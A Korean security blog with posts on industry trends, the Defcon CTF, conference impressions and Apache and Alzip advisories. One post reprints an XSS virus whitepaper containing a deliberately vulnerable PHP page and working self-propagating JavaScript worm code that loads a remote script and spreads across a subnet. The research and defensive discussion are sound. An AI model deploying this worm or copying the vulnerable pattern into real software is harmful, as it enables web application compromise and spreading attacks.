* 보안 인력의 부재 지속

( 전문성이 지속적으로 떨어지고 있는 현실에서 각 영역을 종합적으로 대처할 수 있는 보안 인력은 수요는 급증하나 인력은 계속 부재한 상황이 지속 될 것입니다. )

 

시스템 , Application , 네트워크 , 종합적인 대응 , 보안 체계 수립 이 모든 분야를 컨트롤 할 수 있는 마스터급의 보안 인력은 향후 매우 부족하게 될 것으로 판단 됩니다. 또한 Penetration Test의 영역이 매우 확장이 되어 상당히 많은 부분을 커버하게 될 것으로 예상이 됩니다.  물론 수요도 많이 있을테지만 국내의 현실상 오랜기간 숙달된 인력이나 전문성을 유지하고 있는 인력의 부재로 힘겨운 상태가 지속이 될 것 같네요. 협상력만 잘 보완 한다면 적절한 전문성을 유지한 인력의 경우 상당히 좋은 대우를 받을 수도 있을 것 같습니다.

 

* Application 취약성 발견 지속 및 클라이언트 공격 , 피싱 공격을 통한 이익 추구 일반화

( 올해도 지속이 되었듯이 향후에도 지속이 될 가능성이 높습니다. 또한 신규 프로토콜 상의 문제를 이용한 새로운 유형의 공격들이 나올 가능성이 높다고 판단됩니다. 특히 무선 관련된 802.X 대역에 대한 문제 출현 가능성이 높습니다. )

 

* Bot Network의 복잡화 및 일반화

( Bot 공격의 복잡성은 향후 지속적으로 증가 될 것이고 말 그대로 MonsterBot으로의 진화가 진행 중이며 더욱 심화 될 것으로 판단됩니다. 또한 일반적으로 알려지는 고유명사화 될 정도로 피해를 입힐 수 있을 것 입니다.)

 

* 수정 할 수 없는 Application 결함의 증가

( 취약성을 수정하거나 보완의 책임이 없는 공개 소프트웨어 혹은 개발사의 몰락으로 인한 위험성 증가 )

 

위와 같이 예상이 가능합니다.

이에 대한 대응 및 보안 활동으로는 다음과 같은 행위가 이루어 질 수 있습니다.

 

대응 및 보안활동에 따른 현상

 

*Application 개발 프로세스 단계에서의 보안성 검토 일반화

 

*Application 취약성 진단 도구의 활성화

 

*웜의 일반 PC 침투에 따른 PC 보안 강화

( 패치 및 PC 솔루션 회사들 기회가 될 수도..)

 

*바이러스 및 웜 제작의 일반화에 따른 보안의 어려움 따라서 능력이 있는 회사의 경우 자체 제작이나 변형의 요구에 따른 매뉴얼 보안 툴의 출현 가능성  ( clam 백신처럼...)

 

* 공격에 대응하는 속도를 따라가지 못함으로 인해 지속적인 피해 속출 가능성

 

* 보안 전문 인력의 이탈 가속화

( 노력에 대한 성취도가 매우 낮아 질 것으로 보임.. 노력을 기울여야 하는 부분은 매우 많아 질 것이나 그에 따른 성취도는 낮으며 업무강도 및 피로도는 급증 할 것으로 예상됨 )

 

* 위의 항과는 반대로 보안 인력풀은 산업의 요구에 의해 지속적으로 증가 요청이 있을 것임. 그러나 전반적인 하향 평준화는 어쩔 수 없을 것으로 예상됨.

 

 

기타.

 

*MS 등의 OS 벤더의 기타 사업 진출 가속화

( 보안 및 기타 영리 분야로의 대대적 진출)

 

* 구글등에 의한 Contents 제공 회사의 인프라 점유 확대 및 인프라에 대한 비용이 아닌 컨텐츠 제공에 따른 비용을 청구 받을 가능성 매우 증대

( 이런면에서 구글의 인프라 사업 진출 및 무선망 확대 사업은 매우 중요한 의미를 지님)

 

*손쉬운 IT 기업의 창업이 어려워짐

( 일정 규모 이상의 IT 대기업 출현으로 아이디어를 통한 신규 진출 및 창업이 어려워 질 것이며 인프라 및 보안 분야에 대한 일정 수준 이상의 요구를 맞추어야 함으로 더욱 더 어려워 질 것임. 보안 취약성은 기업의 규모를 가리지 않고 발견이 되고 있으며 일반 Application 발견 비율이 매우 높아 안전한 보안성을 지닌 소프트웨어 설계에는 매우 많은 비용이나 시간이 소요 되고 있음 )

 

* 세계적인 보안 부분 대기업 출현

시만텍 등의 보안 전문 출발 회사 부터 네트워크 부분의 시스코등에 의한 보안 분야 흡수 합병을 통한 거대 기업 출현으로 한 분야의 전문회사는 독창성이나 기술 모방성에 대해 독보적인 영역을 지니지 않는 이상 견디기 힘든 환경 지속될 것임.

 

 

위와 같이 아침에 번뜩 든 생각을 정리해 봤습니다.

짧은 생각이지만 참고 하시고 좋은 의견 있으시면 붙여 주세요.

감사합니다.

 

 

보안 전문가에게 듣는 해킹 프로화에 대한 대처 - 아래 글을 읽다 보니 문득 생각이 나서 써봤습니다.

 

http://www.zdnet.co.kr/itbiz/reports/trend/0,39034651,39134824,00.htm

 

딱 부러지는 답변은 없습니다. 그나마 간략한 발전 방향 및 향후 증가되는 유형에 대한 설명만 있을뿐.. 참고 삼아 읽어 보시면 될 것 같습니다.

 

Posted by 바다란

Defcon과 BlackHat은 서로 양립하는 존재입니다.

그리고 동시에 개최가 됩니다.

보안과 해킹은 서로 상극이면서도 가장 밀접한 관계이기에 더욱 그렇습니다.

 

매년 8월쯤에 미국에서 Defcon과 BlackHat 에서 해킹과 보안 관련된 세미나 세션들이 개최가 됩니다.

CTF란 용어는 왠만한 해킹/보안 컨퍼런스에 나가시면 항상 이루어 지는 세션입니다만 정확한 의미는 공격과 방어를 누가 더 잘하는가 입니다.

 

문제점을 찾고 또 그 문제점을 수정하고 방어하고 공격하여 최고의 점수를 획득한 팀이 우승을 하게 되죠.

CTF 세션의 원조는 Defcon이며 세계 최고수의 공격/방어 전문가들이 나타나는 것으로 유명합니다.

그동안 이런 부분에 대해서 소개할 좋은 기회가 없었는데 보안뉴스에서 기획기사로 연재를 하여 소개 하여 드립니다.

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…①   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3522&search=title&find=&kind=2

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…②   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3523&search=title&find=&kind=2

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…③   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3524&search=title&find=&kind=2

 

아시아권역에서는 14회 대회동안 본선진출팀 조차 여지껏 없었습니다.

이번에 최초 본선진출에 6위를 하였네요. 준비도 많이 못하고 장비도 열악한 상황에서  본선진출 8개팀중 한국을 제외하고는 십여명 단위였는데 한국팀은 핵심멤버도 비자문제로 못간 상황인 환경에서 이뤄낸 결과라  매우 값진 결과라고 생각 합니다.

 

우물안에서 안주하고 서로를 비난하고 기를 죽이고 할때 세계 무대에서는 보다 더 나아가기 위한 활발한 토론 및 연구가 이루어 지고 있습니다. 보안과 해킹은 모순되지만 가장 가까운 부분이며 출발지는 서로 달라도 한번 돌고나면 같은 지점에 있을 수 밖에 없는 뫼비우스의 띠와 같은 분야 입니다.

 

해킹을 못하면서 보안을 한다는 것과 보안을 한다면서 해킹이 어떤 유형으로 발생 하는지에 대해서 이해를 못한다면 지금과 같은 글로벌 비즈니스 산업 특히 국경이 없는 인터넷 분야에서는 치명적으로 낙오 될 수 밖에 없습니다. 글로벌 기업에 대해서는 더더욱 심각한 문제가 됩니다. 어떠한 목적으로 이용하느냐에 따라 크래킹과 해킹으로 구분 할 수 있지만 CTF와 같은 세션은 해킹이며 더더욱 발전을 위한 해킹이 됩니다.

 

지금껏 국내에서는 크래킹과 해킹의 구분없이 무작위적인 단속 강화로 인해 많은 인력들이 사장 되고 분야를 등졌지만 나비효과처럼 피해가 극대화 되는 시점에서는 잃어버린 지식을 찾기에는 매우 어려울 것입니다. 전반적인 인력의 양성과 분야에 대한 긍정적인 지원 효과가 있을때 인터넷 산업의 국제화도 활발해 질 것입니다.

 

국내 게임 산업에 대해 중국 크래커들이 무작위로 공격을 시행 하고 있습니다. 그러나 그들을 처벌 할 방안은 존재 하지 않고  전문화되고 깊이 있는 공격을 막기 위해서는 분석이 필수적이며 공격자의 의도와 기법을 분석할만큼의 능력을 지니고 있어야 합니다.  

공격자의 관점에서 바라보는 것도 대응에 매우 중요한 부분입니다.

이런 부분을 제대로 할 인력이 부족했고 인식이 부족 했었기에 지금까지도 피해가 지속이 되는 것이며 해외 진출 기업들에게도 [특히 인터넷기업] 치명적인 영향을 미치고 있습니다. 각 국가마다 개인정보보호의 영향이 매우 크게 작용하고 있는 국제 비지니스 환경의 변화도 큰 부담이 됩니다.

 

조그마한 취약점을 통해 사용자 정보가 유출 되었을 경우 국가마다 차이는 있으나 심한 경우는 사업에 중대한 Risk가 되고 있는 상황입니다.

무엇이 중요한 부분일까요? 조금만 더 멀리 보았다면 지금과 같지는 않을텐데.. 하는 생각 많이 듭니다.

그 시대의 나름대로 이유와 당위성은 있었겠으나  잡초제거를 한다고 논을 갈아 엎은 모양새가 되어 있습니다.

부족하나마 이제라도 힘을 모으고 긍정적인 전환을 통해 Global Business 환경에 대응하는 것이 필요할 때는 아닌지...

 

긍정의 힘을 믿는 긍정적인 자세가 필요했는데 사회 전반적으로 그런 분위기가 부족한 것은 아닌지하는 생각도.. ^^;

 

11월의 poc2006 기대가 됩니다. 이제는 바뀌고 변화해야 할때.

Posted by 바다란

http://www.zdnet.co.kr/news/internet/hack/0,39031287,39144768,00.htm

 

전체적인 기관의 보안 대응 및 사고 발생시의 프로세스를 점검 하기 위한 cyber storm 프로젝트가 1주일간에 걸쳐 이루어 졌다고 합니다.

 

실제 공격 보다는 공격시의 대응 및 전달 체계 구축에 목표를 둔 것으로 보이고 해당 프로세스에 따라 유기적인 대응 조직 구성에 가장 신경을 쓴 것으로 보이네요.

 

향후 부분적으로 실제 공격 단위의 테스트가 이어질 수 있을 것으로 보입니다.

이 사이버 스톰과 관련하여서는 국내에는 을지훈련이 있으며 보다 더 효과적으로 시행이 되고 있는 것으로 보입니다. 지난 몇 년간의 을지훈련 프로세스를 지켜보면 프로세스 및 연결 체계에 있어서 효율성이 보다 더 나은 것으로 보입니다.

 

상당히 많은 조직과 큰 규모를 움직이기 위해서 필요한 프로세스 점검 차원에서 주목할 필요성은 있을 것 같습니다.

 

Posted by 바다란

안녕하세요. 바다란입니다.

두 가지의 다르자 같은 내용을 지닌 소식입니다.

구글에서 XSS 취약성을 수정 했다는 내용 하나와 XSS가 지니고 있는 추가적인 위험성에 대해서 드러난 paper 입니다. Xss 취약성을 이용한 Virus가 전파 된다면 어떻게 될까요? 또한 특정 사이트나 IP 대역에 대해 Application 차원의 DDOS 가 진행이 된다면 어떻게 될까요?. 생각해 볼만한 .문제인 것 같습니다. Validation check는 언제나 중요합니다. 개발 단위에서부터 서비스의 보안성 점검을 통한 안전한 사이트 오픈 까지 많은 과정이 필요합니다만 앞으로는 이런 과정을 무시할 경우 상당한 어려움에 처할 것 같습니다. XSS 바이러스는 현재 개념차원의 내용이지만 향후에는 상당히 다르게 진화 할 것이고 큰 피해를 입힐 것 같습니다. 지난 해말의 PHP 버그를 이용한 Application wormsanty웜과 같이 어플리케이션 단위에 페이지 변조외에 더욱 직접적인 영향을 미칠 것이라 생각 됩니다.

 

 

구글이 자사 사이트에서 발견된 보안 상의 결함을 수정했다.

보안 연구자들은 결함으로 인해 피싱 사기, 계정 탈취 등의 공격을 받을 우려가 있다고 전했다.
문제를 발견한 보안 업체인 핀잔 소프트웨어(Finjan Software) 따르면 XSS(Cross-Site Scripting 취약성은 구글의 광고 프로그램용 사이트인 애드워즈(AdWords) 고객 트레이닝 사이트에 존재했다.
공격자가 결함을 악용하면 구글의 계정을 탈취하거나 피싱 사기를 일으킬 있다. 사용자의 컴퓨터에 악성 코드가 다운로드 수도 있다.
피싱은 사용자를 속여 아이디(ID), 패스워드, 신용 카드 정보, 주민등록번호 중요한 정보를 가로채는 행위를 말한다.
핀잔은 결함을 지난달 말에 구글에 알렸으며, 구글은 30시간 이내에 결함을 수정했다.
핀잔의 부사장인 리모르 엘바즈(Limor Elbaz)구글의 대응은 매우 좋았다 평가했다.
구글은 자사가조금 경고를 받아 결함을 수정한 것을 인정했다.
구글 관계자는사용자 데이터의 손상은 전혀 없었다. 업계에서 최선으로 여겨지는 방법으로 취약성을 공개한 핀잔에 박수를 보낸다 성명을 발표했다.
보안 문제는 구글 사이트가 인증을 실시하지 않고 있으며, 특정 필드에 여과 없이 데이터를 입력하는 것이 원인이었다. 이러한 경우에는 사용자의 컴퓨터상에서 동작하는 여분의 데이터나 스크립트를 삽입할 있게 된다. 결함을 악용하려면 공격자가 특별한 링크를 준비해 사용자를 속이고 링크된 사이트를 이동시키면 된다.
엘바즈는구글의 사례에서는 링크가 완벽한 구글 링크인 것처럼 보이는 점이 가장 위험했다 전했다.

XSS 결함은 정기적으로 발견되고 있다. 사례는 핀잔이 MS X박스 360 사이트에서 발견했다. 핀잔은 전에도 야후의 기반 전자 메일 서비스에서도 결함을 발견한 적이 있다.
핀잔은 취약점 분석도구 스캐너 기반의 업무 시스템을 보호하는 보안 제품을 판매한다. 핀잔은 인기있는 사이트를 정기적으로 테스트하고 있다.
엘바즈는핀잔은 업체들이 자신들의 사이트를 더욱 안전하게 운영하기를 바라는 입장에서 테스트를 실시하고 있다 말했다.
핀잔은 XSS 결함이 수정되었기 때문에 구글의 사이트는 안전하다고 평가했다.
엘바즈는현재 XSS 취약성을 가진 사이트는 없는 걸로 알고 있다. 핀잔은 사이트의 취약성 문제를 계속해서 주시할 것이다라고 말했다. @

 

 

XSS Virus Whitepaper

------------------------------------------------------------------------

 

 

SUMMARY

 

The following paper explores the new threat of cross-site scripting (XSS) viruses. To date, cross site scripting has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact for Internet continuity, including distributed denial of service (DDOS) attacks, SPAM and dissemination of browser exploits.

This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web based applications such as Wikis and Blogs.

 

DETAILS

 

Introduction:

As an inevitable consequence of expanded web application functionality, security implications on various levels have increased. The appearance of XSS is one such security issue. This vulnerability allows code to be injected into web sites with the aim of being parsed and/or executed by web browsers.

 

Broadly, cross-site scripting can be divided into two areas: permanent and non-permanent. Non-permanent XSS is returned immediately and doesn't remain on the server. Alternatively, permanent XSS will remain on the server and be returned to any browser requesting the injected page. This paper is particularly concerned with the permanent variety of XSS.

 

It is possible to inject self propagating XSS code into a web application and it will spread via client web browsers. This creates a symbiotic relationship between browser and application server. The code will reside on vulnerable web applications and be executed within the client web browser. This relationship is not necessarily one-to-one.

 

Proof of Concept:

The following proof of concept demonstrates a XSS virus. The vulnerable environment created is an example scenario required for XSS viruses and does not show an exhaustive set of possible conditions. It illustrates permanent XSS within a web application. In this case, the vulnerability is exploitable via a get request, which allows a trivial virus to be created.

 

Initially an instance of the vulnerable web application will be seeded with the self-propagating code. When this code is executed by web browsers, it results in their infection. The infected web browsers connect to random sites and perform the exploiting get request. The injected code will, in turn, infect further vulnerable web applications with the self-propagating code.

 

The following crafted permanent XSS exploitable PHP page can be infected with a virus. The page accepts a parameter (param) value and writes it to a file (file.txt). This file is then returned in the request to the browser. The file will contain the previous value of the "param"

parameter. If no parameter is passed it will display the file without updating it.

 

Web Application: index.php

 

<?php

  $p=$HTTP_GET_VARS[ param ];

  $filename =  ./file.txt ;

 

  if ($p !=   ) {

    $handle=fopen($filename,  wb );

    fputs($handle, $p);

    fclose($handle);

  }

 

  $handle = fopen($filename,  r );

  $contents = fread($handle, filesize($filename));

  fclose($handle);

 

  print $contents;

?>

 

This page (index.php) was hosted on multiple virtual servers within a

10.0.0.0/24 subnet. One web application instance was then seeded with the following code which retrieves a JavaScript file and executes it.

Alternatively, it is possible to inject the entire code into the vulnerable applications rather than requesting a JavaScript file. For simplicity, a JavaScript file (xssv.jsp) was requested.

 

Injected Seed Code:

< iframe name="iframex" id="iframex" src="hidden"

style="display:none"></iframe> < script SRC="http://<webserver>/xssv.js"></script>

 

The JavaScript file that was requested in the example is shown below. Its self-propagation uses an iframe which is periodically reloaded using the

loadIframe() function. The target site IP address of the iframe is selected randomly within the 10.0.0.0/24 subnet via the function get_random_ip(). The XSS virus uses a combination of these two functions and the continual periodic invocation using the setInterval() function.

 

Javascipt: xssv.jsp

 

function loadIframe(iframeName, url) {

  if ( window.frames[iframeName] ) {

    window.frames[iframeName].location = url;

    return false;

  }

  else return true;

}

 

function do_request() {

  var ip = get_random_ip();

  var exploit_string = '< iframe name="iframe2" id="iframe2" src="hidden"

style="display:none"></iframe> < script SRC="http://<webserver>/xssv.js"></script>';

 

  loadIframe('iframe2', "http://" + ip + "/index.php?param=" + exploit_string); }

 

function get_random()

{

  var ranNum= Math.round(Math.random()*255);

  return ranNum;

}

 

function get_random_ip()

{

  return "10.0.0."+get_random();

}

 

setInterval("do_request()", 10000);

 

Viewing the seeded web application caused the browser to infect other web applications within the 10.0.0.0/24 subnet. This infection continued until some, but not all, applications were infected. At this point the browser was manually stopped. Another browser was then used to view one of the newly infected web applications. The virus then continued to infect the remaining uninfected web applications within the subnet.

 

This proof of concept shows that under controlled conditions, not dissimilar to a real world environment, a XSS virus can be self-propagating and infectious.

 

Conventional Virus Differences:

Conventional viruses reside and execute on the same system. XSS viruses separate these two requirements in a symbiotic relationship between the server and the browser. The execution occurs on the client browser and the code resides on the server.

 

Platform indiscrimination also differentiates a XSS virus from its conventional counterparts. This is due to the encapsulation within HTML and the HTTP/HTTPS protocol. These standards are supported on most web browsers running on a variety of operating systems, making cross-site scripting viruses platform independent. This platform independence increases the number of potential web applications that can be infected.

 

Infection:

Cross-site scripting virus infection occurs in two stages and usually on at least two devices. As such, there are two kinds of infections that work symbiotically.

 

The server is infected with persistent self-propagating code that it doesn't execute. The second stage is browser infection. The injected code is loaded from the site into the non-persistent web browser and executed.

The execution then seeks new servers to be exploited and potentially executes its payload. Typically, there will be one infected server to many infected browsers.

 

Payload:

Like conventional viruses, XSS viruses are capable of delivering payloads.

The payloads will be executed in the browser and have the restriction of HTML compliant code. That is, the payload can perform HTML functions, including JavaScript.

 

Whilst this does pose limitations, XSS viruses are still capable of malicious activity. For example, the payload could deliver a DDOS attack, display SPAM or contain browser exploits. Future payload capability is likely to be greater due to increasing browser sophistication.

 

Disinfection:

The relationship between the server and one browser can be broken by simply shutting down the browser. However, there is currently no means to prevent browser re-infection other than disabling browser functionality.

 

Potential disinfection methods will involve the referrer field from the request header. This is due to the fact that the referrer is likely to be logged on web servers where infection has been attempted. Thus, where referrer spoofing hasn't occurred, following the log files will reveal a trail back to the source of the virus.

 

Prevention:

A common initial preventative to viral infection is a network level firewall. As HTTP/HTTPS protocols are afforded un-vetted access through common firewall configurations, these firewall barriers are ineffectual. A potential remedy to this is an application firewall with the appropriate XSS virus signatures.

 

Whilst unlikely, the most obvious way to prevent XSS viruses is to remove XSS vulnerabilities from web applications. Another method is for browsers to enforce a request restriction on a web page's sub-elements. The restriction would only allow sub-elements to be requested from the main URL's domain. Thus, preventing XSS viruses from infecting other web applications.

 

Conclusion:

The infectious nature of XSS viruses has been demonstrated within a controlled environment. It was achieved through a purposely crafted vulnerable web application distributed across a subnet. This environment was subsequently infected.

 

XSS viruses are a new species. They distinguish themselves from their conventional cousins through the requirement for a server-client symbiotic relationship and their platform independence. These differences have both positive and negative influences on the virulence of infection.

 

This paper illustrates that XSS viruses are platform independent and capable of carrying out malicious functions. Whilst there are mitigating factors, these points coupled with the increasing sophistication of web browsers show the threat of XSS viruses. Proactive measures need to be taken in order to combat this threat, before XSS viruses become endemic.

 

References:

[1] Remote Scripting with IFRAMEs -

<http://developer.apple.com/internet/webcontent/iframe.html>

http://developer.apple.com/internet/webcontent/iframe.html

[2] HTML Code Injection and Cross-site scripting - <http://www.technicalinfo.net/papers/CSS.html>

http://www.technicalinfo.net/papers/CSS.html

[3] JavaScript: Random Scripts -

<http://www.pageresource.com/jscript/jrandom.htm>

http://www.pageresource.com/jscript/jrandom.htm

[4] Mozilla Foundation Security Advisory 2005-58 - <http://www.mozilla.org/security/announce/mfsa2005-58.html#xmlhttp>

http://www.mozilla.org/security/announce/mfsa2005-58.html#xmlhttp

[5] PHP Manual -  <http://www.php.net> http://www.php.net [6] Scripting Iframes - Tutorial and Examples - <http://www.dyn-web.com/dhtml/iframes/>

http://www.dyn-web.com/dhtml/iframes/

[7] CGISecurity's Cross Site Scripting FAQ - <http://www.cgisecurity.com/articles/xss-faq.shtml>

http://www.cgisecurity.com/articles/xss-faq.shtml

 

 

ADDITIONAL INFORMATION

 

The information has been provided by  <mailto:wade@bindshell.net> Wade Alcorn.

The original article can be found at: 

<http://www.bindshell.net/papers/xssv.html>

http://www.bindshell.net/papers/xssv.html

 

 

 

 

Posted by 바다란
몇 가지 느낀점이 있는데 간단하게 언급을 하면 다음과 같습니다.
차후 다시 정리를 해볼께요.

CSI  컨퍼런스 :
- 각국 보안 전문가 들이 참가를 하며 주로 미국 인력 ( 정부 기관 및 보안 담당자, 보안 업체 인력 )들이 참여를 합니다. 제품 전시회와 컨퍼런스를 같이 개최를 하며 상당히 조직적으로 운영이 됩니다.

* 보안이라는 전 분야에 걸쳐 ( Policy , 기술 , 개발 , Forensic , Web ,감사 ,해킹 등 ) 기술 단계별로 분류한 후  이슈에 대해 세션을 가지고 운영을 합니다. 3일간의 기간 동안 각 섹터별로 세션을 계속 끌고 가더군요.

* 각 단계별로 발표하는 자료에는 구라들도 상당 부분 있었고 가장 마음 아팠던 부분은 정부 기관에서 주도적으로 지원을 하고 있으며 한 분야의 전문가라도 상당히 많은 인지도를 지니고 인정을 받는 것이 속 쓰리더군요.

* 전체적인 기술 수준은 최상위 수준의 경우에도 그다지 이해하기 어렵지는 않았으며 기술레벨이나 세미나의 내용도 그리 높은 수준은 아니였습니다. 그러나 종사 인력이 많아서 그런지 분야에 대해 깊이 있는 이해를 하는 인력들을 종종 볼 수 있었습니다. 우리 처럼 만능 슈퍼맨은 못 봤습니다. ㅠ,ㅠ

* 질문할 내용도 많았고 궁금한 사안도 많았지만 그들만의 리그이고 또 네이티브가 아니다 보니 애로사안들이 돌출 하더군요.. 때론 조잡한 세션들도 많이 있었습니다.

* 전체적으로 풍족하게 컨퍼런스를 진행 하더군요 ( 참가비를 비싸게 받으니..쩝 )  식사 제공 및 기업들의 스폰서 후원이 매우 상당한 수준이였습니다.  - 국방 관련 및 국가 관련 프로젝트에 있는 인력들이 많다보니 기업들의 공식적인 로비 수준으로 접근을 하더군요.

* 개발 및 웹 , 포렌식 , 정책 등의 각 분야별로 폭넓은 저변인력을 가지고 있는 것에 매우 부러웠다는....

* 해킹 관련 세션들도 있었으나 그 수준은 그다지 높지 않았으나 일반적인 보안 인력들에게는 매우 호응도가 높았습니다. 이런 해킹 세션들은 최근의 컨퍼런스 붐에 따른 부가적인 장착이 아닌가 하는 생각도 들더군요.

-------------------
결론적으로 보안이라는 큰 테두리에서 움직이는 역량을 볼 수 있었습니다.  전반적인 기술레벨은 그다지 높지 않았으며 개인적인 평가로 보면 국내 인력들도 각 분야 인력들이 회사 제품 선전하는 설명회 할 여력을 다 모아서 럭셔리 하게 세션 스케쥴 잡아서 진행하면 독자적인 역량을 지닐 수 있을 것을 판단 됩니다.  또 그만큼의 실력도 충분히 됩니다. 각 분야별로 다 일정정도의 전문 영역에 국내 보안 인력들은 도달한 것으로 보입니다. 다만 문제는 세계적인 흐름을 주도하기 위해서는 영어권역에 속해 있는 것이 매우 좋았을 것이나 이 문제로 인하여 향후에도 흐름 주도는 힘들어 보입니다.

성격상 여러 회사를 전전한 까닭에 많은 부분을 보고 느꼈지만 국내도 역량의 결집시 상당히 높은 수준으로 집합이 될 것으로 보입니다. 다만 정책적인 지원이나 주도적인 리딩이 없다는 것이 문제가 되겠죠. Concert와 같은 기회가 좋은 찬스이나  이 세션을 보다 확대하고 다양한 분야에서 참여 하도록 하여야 하며 사전에 일정 수준 이상으로 거를 수 있다면 아주 좋은 기회가 될 듯 싶습니다. 물론 리딩을 하는 그룹의 의지가 있어야 겠지요.

아무튼 가서 궁금증을 해소하든 새로운 주제를 던지든 회화는 자유자재로 해야 할 것 같습니다. 생활영어 말구요..  레벨이나 전문 분야에 대한 내용은 오래지 않아 다시 정리해 보도록 하겠습니다.
간단하게 의견 피력이 필요 할 것 같아. 급히 써 봅니다.

좋은 하루 되세요.
Posted by 바다란

http://www.securityfocus.com/news/11405

 

SPI Dynamic의 Hoffman이 지금 라스베거스에서 열리고 있는 BlackHat에서 스크립트를 이용한 공격과 웹 Application을 통한 웜에 대해서 언급을 하였다고 한다. 기사뿐 아니라 실제 발표된 스크립트 문서를 확인해 본 결과 특별하거나 새로운 이슈는 아니라고 판단되며 현재 나온 상황의 종합판이라 할 수 있을 것 같다.

 

이미 2004년말에 출현한 Santy worm을 보며 향후 방향이 어플리케이션으로 넘어감을 예상 할 수 있었는데 앞으로는 더욱 더 심각할 수 있다는 생각을 한다.

 

그 당시에 작성한 문서도 일정부분 참고가 될 수 있을 것이다.

http://blog.naver.com/p4ssion/50001891757

 

Ajax는 사용자의 PC와 사용자의 Client에 많은 기능을 부여하여 원활한 자유도를 확보하는 기법이다. 이 기법의 기본은 Script 베이스로 이루어진다. DOM과 Script간의 비동기적인 통신을 이용하여 유기적인 연결이 되는 것으로 묘사하는 기법이라 할 수 있는데 클라이언트에 자유도를 증가 시킬 수록 문제 심각도는 커질 것임은 명백하다.

 

Myspace의 경우에도 Yahoo Messenger의 경우에도 일반적인 총칭으로 Ajax 라 부를 수 있는데 이런 기능을 직접 활용한 웜의 출현은 지난해 말과 올해들어 충분히 목격을 하였을 것이다.

 

 

마이스페이스를 목표로 한 어플리케이션 웜 과 야후 메신저를 목표로 한 자동 전파 기능을 지닌 코드들의 특징..그리고 향후 나올 가능성이 존재하는 것들에 대한 위험성에는 특정 기업의 Application 에 대한 공격이 증가 할 것이고 온라인화 되는 문화가 한국 내에서는 상당부분 빠르게 발전되어 문제들도 빨리 나타났으나 해외의 경우에는 이제 부터 더욱 더 본격화 될 것이라 본다.

 

이슈의 경우에도 향후 해외에서 적극적인 이슈들이 나올 수 있을 것이다.

 

운영체제의 계정이나 권한 획득이 아닌 온라인 상의 유저들의 정보를 얻기 위한 코드들과 어뷰징이 성행 할 수 밖에 없으며 위험성은 더욱 높아 질 것이다.

 

시스템 자체의 공격이 더 이상 중요하지 않다는 의미는 아니나 또 다른 분야에서의 대형 이슈가 향후에는 출현을 한다는 것이다.

 

크로스 사이트 스크립팅을 막지 않으면 대부분 문제가 발생 할 수 밖에 없으며 모든 문제의 근본은 Validation check에 존재하고 있다. SQL Injection도 마찬가지 이며 CSS Attack도 마찬가지이다.

 

Web Method를 이용한 Application 공격도 충분히 예상을 할 수 있어야 하며 자동화된 공격으로 변질 될 경우의 탐지 로직에 대해서도 보안 전문가라면 충분히 고민을 해야만 한다.

 

이래저래 이슈들은 계속 묻혀져 있다 적당한 시점에 계속 이슈화 된다. 해야 할일들과 그만큼 관심을 두고 정리를 해야 하는 부분들이 많아진 것이라 할 수 있다.

 

올해 BlackHat에는 참가하지 못했지만 여러 발표자료들을 보면서 크고 놀랍고 센셔이널한 이슈들은 아니여도 전문적이고 깊이 있는 분석들을 몇 몇 발견 할 수 있었다.

그 깊이가 또 다른 경험을 낳을 수 있을 것이라 생각된다.

 

간단하게..정리

Posted by 바다란

바다란입니다.

 

금일 보안 관련 메일링 리스트를 보다 보니 눈에 띄는 두 가지 취약성이 있어서 게시를 하게 되었습니다.
하나는 apache 모듈 관련된 인증 회피 부분이고 하나는 앞으로 나올 가능성이 있는 악성 바이러스와 관련된 Alzip 취약성 입니다.
아마도 Apache는 서비스 영역에 대다수 사용이 되고 있고 Alzip의 경우는 개인 사용자 단위에서 많이 사용하고 있을 것입니다. 따라서 주의가 필요합니다.

 

* 바이러스에 악용될 신규 취약성인 Alzip은 6.13 버전으로 업데이트 권고 드립니다. - 개인 사용자
* Apache . .htaccess 에서 require group 지시어 사용시 1.5 또는 2.1 버전으로 업데이트 권고 드립니다.

 

Apache의 Mod_auth_shadow 모듈에 대해 인증 회피가 가능한 문제가 발견이 되었습니다.
내부적으로 서비스에서 apache를 이용하고 인증 관련된 부분에 mod_auth_shadow 모듈을 사용한다면 업데이트를 권고 합니다.


모듈 사용시 apache Version을 1.5 또는 2.1 버전 이상으로 업데이트를 권고합니다.
mod_auth_shadow 모듈은 .htaccess 에서 require group 이라는 지시어를 사용할 때 자동적으로 사용이 됩니다. 따라서 해당 지시어를 사용하는지 확인이 필요할 것 같습니다.

ALZIP 관련된 문제는 메일을 통해 압축 파일을 받았을 경우 또는 메신저나 파일 공유를 통해서 압축된 파일을 받았을 경우에 시스템에 영향을 미칠 수 있습니다. 신규 전파 가능한 경로로서 이용이 될 수 있을 것 같습니다.


압축된 파일을 풀때 경계를 체크하지 않은 문제로 인해 오버플로우 코드를 심을 수 있습니다. 스택 및 힙 오버플로우가 동시에 발견 되었고 ARJ , ALZ 파일의 경우는 열었을 경우 악성코드가 실행이 되며 그외의 압축 파일은 압축 파일을 풀때 악성코드가 실행이 됩니다.

따라서 한국을 겨냥한 특정 바이러스의 살포도 가능한 취약성이며 향후 개인사용자들을 대상으로 무작위로 퍼질 가능성이 있는 문제중의 하나입니다.
사용하시는 압축툴이 알집일 경우 버전을 확인 하시고 업데이트 반드시 하셔서 차후에 발생할 수 있는 피해를 미연에 막는 IT 생활의 지혜를 누리시길 ^^

 

=========================================================================================

TITLE:
Apache mod_auth_shadow Module "require group" Incorrect Authentication

SECUNIA ADVISORY ID:
SA17060

VERIFY ADVISORY:
http://secunia.com/advisories/17060/

CRITICAL:
Less critical

IMPACT:
Security Bypass

WHERE:
From remote

SOFTWARE:
mod_auth_shadow (module for Apache)
http://secunia.com/product/2811/

DESCRIPTION:
David Herselman has reported a security issue in the mod_auth_shadow module for Apache,
which potentially can be exploited by malicious people to bypass certain security restrictions.

The problem is that the mod_auth_shadow authentication scheme is automatically used when using the
"require group" directive in a ".htaccess" file, which may be different than the intended HTTP authentication scheme.

SOLUTION:
Update to version 1.5 or 2.1.
http://sourceforge.net/project/showfiles.php?group_id=11283

